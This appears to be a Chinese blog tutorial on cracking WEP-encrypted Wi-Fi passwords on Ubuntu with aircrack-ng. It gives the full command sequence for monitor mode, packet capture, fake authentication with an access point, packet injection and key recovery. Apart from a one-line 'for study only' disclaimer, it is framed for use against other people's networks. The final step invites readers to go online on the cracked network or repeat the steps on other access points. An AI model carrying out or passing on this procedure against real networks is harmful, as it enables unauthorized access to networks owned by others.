Ubuntu使用aircrack-ng
本文仅供学习研究,请勿用于非法用途
一、启动无线网卡的监控模式
在终端中输入以下命令:
sudo airmon-ng start wlan0
(这里的 wlan0
是无线网卡的端口,你可以在终端中输入 ifconfig
命令来查看自己的无线网卡端口。)
二、查看无线接入点(AP)
在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后,无线网的端口变为 mon0
。)
通过此命令可以查看哪些采用 WEP 加密的无线接入点(AP)在线,查看完成后,按 Ctrl+C
退出,并保留该终端。
三、抓包
打开另一个终端,输入以下命令:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(解释:-c
后面的 6
是要破解的 AP 的工作频道;--bssid
后面的 AP's MAC
是欲破解的 AP 的 MAC 地址;-w
后面的 wep
是抓下来的数据包 DATA
保存的文件名。具体的频道和 MAC 地址需要根据步骤二中查看到的在线 AP 进行更改,DATA
保存的文件名可自行随意命名。)
四、与 AP 建立虚拟连接
再打开一个新的终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(解释:-h
后面的 My MAC
是自己的无线网卡的 MAC 地址,你可以使用命令 iwlist wlan0 scanning
查看自己的 MAC 地址。)
五、进行注入
成功建立虚拟连接后,输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
这时,可以回头查看步骤三中的终端,看看 DATA
是否开始大量增加。
六、解密
在收集到 5000 个以上的 DATA
之后,打开另一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密操作。
(如果没有计算出密码,请继续等待,aircrack-ng
会在 DATA
每增加 5000 个之后自动重新运行,直到计算出密码为止。)
七、收工
成功破解出密码后,在终端中输入 sudo airomon-ng stop mon0
关闭监控模式,因为如果不这样做,无线网卡会一直向刚刚的 AP 进行注入操作,使用 Ctrl+C
退出或直接关闭终端都无法停止。现在,你可以上网冲浪啦,或者重复步骤 1 至 7 破解其他的 AP。不过,兄弟们在上网冲浪时可别太猛了,不然给网络的主人带来麻烦就不好啦。
当前页面是本站的「Google AMP」版。查看和发表评论请点击:完整版 »